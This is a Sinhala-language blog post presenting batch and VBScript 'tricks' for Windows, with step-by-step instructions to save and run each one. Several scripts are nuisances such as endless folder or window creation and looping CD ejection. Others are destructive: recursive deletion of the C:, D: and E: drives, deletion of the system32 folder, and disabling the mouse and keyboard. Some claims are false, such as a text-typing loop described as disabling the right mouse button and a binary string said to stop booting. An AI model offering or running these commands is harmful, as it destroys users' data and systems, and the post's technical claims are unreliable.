http://www.123-banner.com/bannertmp/123-banner_com_2450125.swf

Monday, June 9, 2014

Notepad , Wordpad වලින් පොඩි සෙල්ලම් ටිකක් දාමුද ?

Posted at  3:06 AM  |  in  Tricks



ඔන්න සමහර බ්ලොග් හිමියො දාලා තියනවා  .vbs , .bat කියන ස්ක්‍රිප්ට් කියන්නෙ වෛරස් කියල. මම නම් එසේ අර්ථ දැක්වීම එතරම් සුදුසුයි කියල හිතන්නෙ නෑ. මොකද වෛරස් එකක් ක්‍රියාත්මක වෙන්න හැමවිටම පරිගනකය භාවිතා කරන්නාගේ සහය අවශ්‍ය වන්නේ නෑ. නමුත් මේ .vbs , .bat කියන ස්ක්‍රිප්ට් වලට නම් තනිව ක්‍රියාත්මක වීමේ හැකියාවක් නැහැ. හැබැයි මේ ස්ක්‍රිප්ට් වලට පරිගණයක් අඩපන කිරීමට නම් හැකියාව තිබෙන බව නම් සත්‍යක්. එහෙනම් බලමුකො කොහොමද මේ Notepad , Wordpad සෙල්ලම් දාන්නෙ කියලා.....

ඔන්න මුලින්ම බලමු එක දිගට ෆෝල්ඩර් 1 000 000  විවෘත වන විදියට ස්ක්‍රිප්ට් එකක් ලියන්නෙ කොහොමද කියලා....

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

@echo off
:top
md %random%
goto top

දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .bat කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට එක දිගට ෆෝල්ඩර් 1000000 ක් විවෘත වේවි.

 CMD කියන Box එක Close කරලා මෙය නැවැත්වීමට පුලුවන්.... 

ඔන්න දැන් බලමු එක දිගට Notepad file 20000 විවෘත වන විදියෙ ස්ක්‍රිප්ට් එකක් ලියන්නෙ කොහොමද කියලා

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

 @ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top

දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .bat කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට එක දිගට Notepad file 20000 ක් විවෘත වේවි.


 CMD කියන Box එක Close කරලා මෙය නැවැත්වීමට පුලුවන්.... 

දැන් බලමු keybord එක අඩපන කරන්න ස්ක්‍රිප්ට් එකක් ලියන්නෙ කොහොමද කියලා

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .vbs කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට එක දිගට keybord එකේ capslock , numlock , scrolllock ඔන් ඕෆ් වෙයි... හිතල බලන්කො එහෙම වෙද්දි වැඩක් කරගන්න පුලුවන් වෙයිද කියලා..

Widows Task Manager වලට ගිහිල්ලා එහි  Proccess  වල  තියෙන wscript කියන එක End Proccess කරලා මෙය නවත්වන්න පුලුවන්..

Mouse එකේ Right Button  එක වැඩ නැති වෙන විදියට ස්ක්‍රිප්ට් එකක් ලියමු...

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop

දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .vbs කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට mouse එකේ  right button  එක ක්‍රියාවිරහිත වෙලා තියෙයි..

Widows Task Manager වලට ගිහිල්ලා එහි  Proccess  වල  තියෙන wscript.exe කියන එක End Proccess කරලා මෙය නවත්වන්න පුලුවන්..

 Mouse එක සහ Keyboard  එක ක්‍රියාවිරහිත වෙන්න ස්ක්‍රිප්ට් එකක් ලියමු...

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable  


දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .bat කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට mouse keybord දෙක ක්‍රියා විරහිත වෙලා තියෙයි...

restart කරාට පසුව තමයි ආපහු ඉතින් mouse keybord වලට බලය ලැබෙන්නෙ.

Command Prompt සහ Paint,Pinball වැනි වැඩසටහන් නොනවත්වා විවෘත වීමට ස්ක්‍රිප්ට් එකක් ලියමු..

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

@echo off
msg * (YOUR COPMUTER FULL RUN VIRUS)
cls
msg * (YOUR COPMUTER FULL RUN VIRUS)
cls
msg * (YOUR COPMUTER FULL RUN VIRUS)
cls

begin
goto %random%
:1
start cmd.exe
goto begin
:2
start paint.exe
goto begin
:3
start pinball.exe
goto begin :4
start iexplore.exe
goto begin
:5
start explorer.exe
goto begin
:6
start iexplore.exe "hit3stars.blogspot.com"
goto begin


දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .bat කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට දිගින් දිගටම නොනවත්වා paint , pinball වැනි වැඩසටහන් විවෘත වේවි

CMD කියන Box එක Close කරලා මෙය නැවැත්වීමට පුලුවන්....

තත්පර තුනෙන් හාර්ඩ් ඩිස්කය ෆෝර්මැට් වෙන්න ස්ක්‍රිප්ට් එකක් ලියමු...

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

  "rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\" ( without quotes )


දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .bat කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට තත්පර තුනක් ඇතුලත හාර්ඩ් ඩිස්කය ෆෝර්මැට් වේවි.

අත්හදා බැලුවොත් නැවත මෙහෙයුම් පද්ධතිය ස්ථාපනය කරන්න වෙනවා..

CD Rom , DVD Rom , DVD Writer නොනවත්වා ක්‍රියාත්මක වීමට ස්ක්‍රිප්ට් එකක් ලියමු...

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

 Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .vbs කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට සීඩී ඩීවීඩී රොම් ඇතුලට යාම සහ නැවත එලියට ඒම දිගින් දිගටම නොනවත්වා සිදු වෙනවා..

Widows Task Manager වලට ගිහිල්ලා එහි  Proccess  වල  තියෙන wscript.exe කියන එක End Proccess කරලා මෙය නවත්වන්න පුලුවන්..

පරිගනකය boot වන එක නැවත්වීමට ස්ක්‍රිප්ට් එකක් ලියමු..

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001


දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .exe කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට පරිගනකය බූට් වෙන හක නවතීවි.

System 32 File Delect  කරන්න ස්ක්‍රිප්ට් එකක් ලියමු...

දැන්  මුලින්ම මේ පහල Highlight කරල තියන Code එක Notepad , Wordpad වගේ තමන් කැමති එකකට copy කර ගන්නකෝ...

   " del c:\WINDOWS\system32\*.*/q "

දැන් Save As හරහා File Name කියන එකට තමන් කැමති නමක් දීලා අවසානයට .bat කියලා ගහලා Save කරන්න...

දැන්  Save කරපු file එක click කරල බලන්නකෝ.. එවිට පීසී එක ඕපන් කර ගන්න බැරැව යයි..

ස්ක්‍රිප්ට් එක පොඩි උනාට වැඩේ ලොකුයි.උත්තරේ ඉතින් නැවත මෙහෙයුම් පද්ධතිය ස්ථාපනය කරන එක තමයි ඉතින්....

දැන් ඔන්න එක එක මහත්වරැ කියයි කොපි කළා කියලා... ඔව් ඉතින් මගෙ දැනුම නෙවෙයි. කොපි කළා තමයි. හැබැයි තවත් බ්ලොගියකින් නෙවෙයි. ජාවා , පීඒච්පී ජීවිතය කරගත්තු කොල්ලෙක්ගෙ පොඩි නෝර්ට් පොතකින්.. මේව මගෙ දැනුම වෙන්න මම බිල් ග්රේට් නෙවෙයි නේ....

Share this post

3 comments:

  1. මම නං ඕං කවදාකවත් කියලනෑ .vbs , .bat කියන්නෙ වයිරස් අප්පොලා... හාමිනේලා කියල.. උඹේ අර්ථ දැක්වීම සහසුද්දෙන්ම ඇත්ත.. සරලව තේරුම්ගන්න පුළුවන් විදියට කියල තියනව.. අනික notepad එකෙන් දාන සෙල්ලම් ටිකත් මරු ඈ... උඹට ජයෙන් ජය මල්ලියෝ... සැමදා මගෙන් උඹට අත වගේම හිත... :)

    ReplyDelete
  2. ඔබට බොහොම ස්තූතියි සහෝදරයා.......

    ReplyDelete

About-Privacy Policy-Contact us
Copyright © 2013 hIt 3 sTaRs bLoG. Distributed By Blogger Themes | Blogger Template by Bloggertheme9
Proudly Powered by Blogger.
back to top